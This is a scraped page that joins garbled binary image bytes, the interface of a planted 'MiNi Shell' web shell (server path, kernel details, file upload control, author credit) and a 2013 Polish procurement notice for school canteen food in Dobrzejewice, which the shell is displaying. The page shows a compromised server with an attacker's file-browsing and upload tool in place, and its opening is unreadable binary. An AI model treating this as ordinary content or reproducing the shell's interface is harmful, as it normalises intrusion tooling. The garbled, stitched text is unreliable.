JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131210/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131210/268227-N-2013.html

<p class="kh_header"><b>Dobrzejewice: zakup i dostawa artykułów żywnościowych na potrzeby stołówki szkolnej w roku 2014</b><br>
<b>Numer ogłoszenia: 268227 - 2013; data zamieszczenia: 10.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Gimnazjum i LO im. Prymasa Stefana Kardynała Wyszyńskiego , Dobrzejewice 58 b, 87-123 Dobrzejewice, woj. kujawsko-pomorskie, tel. 56 674 46 15/16.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zsdobrzejewice.nets.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.zsdobrezjewice.nets.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka podległa Gminie Obrowo.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> zakup i dostawa artykułów żywnościowych na potrzeby stołówki szkolnej w roku 2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> przedmiotem zamówienia jest zakup i dostawa artykułów spożywczych na potrzeby stołówki szkolnej Zespołu Szkół Gimnazjum i Liceum im. Prymasa Stefana Kardynała w Dobrzejewicach 58b, niezbędnych do sporządzania posiłków w roku 2014r. 
Zakres i wielkość zamówienia:
Grupa I:
1.Bułka tarta                      0,5kg	15821000-9	szt	300;
2.Cukier                               1 kg	15831000-4	szt	140
3.Kasza  gryczana              400g	15613100-9	szt	30
4.Kasza jęczmienna             1 kg	15613100-9	szt	30
5.Kasza jęczmienna karton 400g	15613100-9	szt	100
6.Makaron  zacierka           250g	15851110-2	szt	30
7.Makaron łazanka            0,5kg	15851110-2	szt	150
8.Makaron nitki                    1kg	15851110-2	szt	500
9.Makaron spagetti             400g                               	15851190-6	szt	100
10.Makaron świderki             1kg	15851110-2	szt	250
11.Mąka pszenna typ 405      1 kg	15612100-2	szt	300
12.Ryż                                   1 kg	15614100-6	szt	250
13.Ryż karton                       400g	15614100-6	szt	250
14.Sól                                    1 kg	15872400-5	szt	200

Grupa II :
1.Bazylia     100g	15872000-1	szt	50
2.Cukier puder    400g	15830000-5	szt	20
3.Dżem truskawkowy    440g	15332290-3	szt	100
4.Fasola drobna       1kg	15331131-4	szt.	40
5.Fasola Jaś                    	01121213-7	kg	170
6.Groch łuskany                     	01121220-9	kg	70
7.Groszek konserwowy   400g	15331460-9	szt	100
8.Ketchup       1l	15871000-4	szt	100
9.Kompot truskawkowy    0,9 l	15332100-5	szt	30
10.Kompot wiśniowy      0,9 l	15332100-5	szt	30
11.Kompot z czarnej porzeczki   0,9 l	15332100-5	szt	30
12.Koncentrat pomidorowy    1kg 	15331425-2	szt	120
13.Kwasek cytrynowy   1kg	15871000-4	szt	50
14.Liść laurowy  100g	15872000-1	szt	50
15.Majeranek   100g	15872300-4	szt	130
16.Ocet 10%       0,5l	15871100-5	szt	60
17.Ogórki  konserwowe     900 ml	15331500-2	szt	200
18.Olej  rzepakowy      3l                              	15411200-4	szt	150
19.Panierka do drobiu  3kg	15821000-9	szt.	8
20.Papryka konserwowa      660 g	15331500-2	szt	20
21.Papryka ostra  20g	15321000-1	kg	50
22.Papryka słodka                   	15871000-4	kg	60
23.Pieprz czarny ziarnisty    1kg	15872100-2	szt	50
24.Pieprz mielony  20g	15871000-4	szt	300
25.Pierz ziołowy 20g	15872100- 2	szt.	70
26.Przyprawa do mięs    200g	15871200-6	szt	160
27.Przyprawa Warzywko   1kg (lub równoważne)	15872000-1	szt	100
28.Sos słodko-kwaśny  400g	15332200-6	szt.	150
29.Syrop owocowy       0,5	15321000-1	szt	900
30.Szczaw konserwowy    330g	15331000-7	szt	60
31.Ziele angielskie     100g	15872300-4	szt	60
32.Zioła prowansalskie      100g	15872000-1	szt	50
33.Zupa pieczarkowa w proszku	15511700-0	szt.	100
34.Żurek  Kujawski     0,5l   (lub równoważne)	15891000-0	szt	50

Grupa III:
1.Ziemniaki	01112100-6	kg	      7500
2.Ziemniaki młode	01112100-6	kg	500

Grupa IV :
1.  Jajka świeże duże 65-70g	   01242000-5  szt. 5000

Grupa V:
1.Banany 	15330000-0	kg	400
2.Buraki	01121111-2	kg	600
3.Cebula	01121113-6	kg	200
4.Fasola szparagowa  żółta	15331130-7	kg	100
5.Fasolka  szparagowa  zielona	15331130-7	kg	50
6.Groszek konserwowy 400g	15331162-1	szt.	80
7.Jabłka	01131321-0	kg	150
8.Kalafior  świeży	15300000-0	szt	100
9.Kapusta biała	01121410-8	kg	130
10.Kapusta czerwona	01121410-8	kg	120
11.Kapusta kiszona	15331142-4	kg	400
12.Kapusta pekińska	01121410-8	kg	120
13.Koper	15300000-0	pęczek	250
14.Kwas z kapusty 0,5 l	15331142-4	szt.	50
15.Mandarynki 	15330000-0	kg	200
16.Marchew	01121112-9	kg	400
17.Natka	15300000-0	pęczek	250
18.Ogórek kiszony	15331000-7	kg	230
19.Ogórek świeży                  	01121270-4	kg	70
20.Pieczarki	15331135-2	kg	350
21.Pietruszka korzeń	01121110-5	kg	250
22.Pomidory	01121240-5	kg	70
23.Por   	01121110-5	kg	250
24.Sałata	01121310-7	szt	50
25.Seler korzeń	01121100-2	kg	300

Grupa VI:
1.Filet z morszczuka bez glazury SHP	15220000-6	kg	150
2.Filet z dorsza   bez glazury SHP	15220000-6	kg	  50
3.Paluszki  rybne z fileta z mintaja  o zawartości mięsa rybiego co najmniej50%	     15220000-6	kg	 70

Grupa VII:
1.Boczek  świeży bez żeberek	15110000-2	kg	30
2.Karkówka wieprzowa surowa b/k	15111390	kg	200
3.Kiełbasa biała wieprzowa	15131133-6	kg	120
4.Kiełbasa śląska wieprzowa 	15131133-6	kg	250
5.Kiełbasa zwyczajna	15131133-6	kg	100
6.Kości wędzone	15111310-3	kg	50
7.Kości wieprzowe z karkówki i schabu	15114000-3	kg	350
8.Łopatka b/k	15110000-2	kg	350
9.Mięso mielone wieprzowe	15130000-8	kg	750
10.Schab  b/k	15110000-2	kg	270
11.smalec	15114000-0	kg	30
12.Wątroba wieprzowa	15114000-0	kg	100

Grupa VIII:
1.Kurczak świeży                   	15112130-6	kg	950
2.Filet z kurczaka	15112210-1	kg	550
3.Udka z kurczaka	15112210-1	kg	300
4.Wątroba  drobiowa	15112300-9	kg	100
5.Kiełbasa śląska  z drobiu	15131130-5	kg	30

Grupa IX:
1.Margaryna  Kasia  250g  (lub równoważne)	15431100-9	szt	30
2.Masło ekstra     200g	15530000-2	szt	150
3.Maślanka     1l	15512000-0	szt	50
4.Mleko  3,2%     karton       1l	15511210-8	szt	250
5.Ser żółty Gouda	15544400-3	kg	50
6.Śmietana 12%      0,5 l       	15512000-0	szt	450
7.Śmietana 18%      1kg	15512000-0	szt	100

Grupa X:
1.Kalafior    2,5kg	15331170-9	kg	45
2.Kopytka   2,5 kg	15311200-3	kg	150
3. Marchewka - kostka  2,5kg	15331170-9	kg	250
4.Mieszanka chińska    2,5kg	15331170-9	kg	45
5.Mieszanka warzywna  2 skład (marchew + groszek)  2,5kg 15331170-9kg	45
6.Mieszanka warzywna 7 skład.     2,5kg	15871200-6	kg	180
7.Pierogi z kapustą i grzybami   2,5 kg	15896000-5	kg	100
8.Pierogi z mięsem  2,5kg	15896000-5	kg	100
9.Pierogi z truskawką    2,5 kg	15896000-5	kg	100

Grupa XI :
1.Chleb krojony pszenny   500g          	15811100-7	szt	1000
2.Bułki  małe	15811400-0	szt	1200
3.Pączki 	15811000-6	szt	450
4.Drożdżówki 	15811000-6	szt	450.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.00.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Każdy Wykonawca przystępujący do postępowania o udzieleniu zamówienia publicznego zobowiązany jest do złożenia oświadczenia zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Każdy Wykonawca przystępujący do postępowania o udzieleniu zamówienia publicznego zobowiązany jest do złożenia oświadczenia zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Każdy Wykonawca przystępujący do postępowania o udzieleniu zamówienia publicznego zobowiązany jest do złożenia oświadczenia zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Każdy Wykonawca przystępujący do postępowania o udzieleniu zamówienia publicznego zobowiązany jest do złożenia oświadczenia zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Każdy Wykonawca przystępujący do postępowania o udzieleniu zamówienia publicznego zobowiązany jest do złożenia oświadczenia zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca dołączy do oferty następujące dokumenty:
1. Formularz ofertowy- zwór ofert stanowi załącznik nr 1;
2.Odpowiednie pełnomocnictwa- w sytuacjach określonych w rozdz. IX pkt6 SIWZ oraz w przypadku składania ofert wspólnych.
3.Oświadczenie o równoważności produktów wraz z opisem-w przypadku składania ofert równoważnych</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zsdobrzejewice.nets.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W sekretariacie Zespołu Szkół Gimnazjum i Liceum w Dobrzejewicach 58 b,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.12.2013 godzina 09:15, miejsce: Sekretariat Zespołu Szkół Gimnazjum i Liceum w Dobrzejewicach 58 b,.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com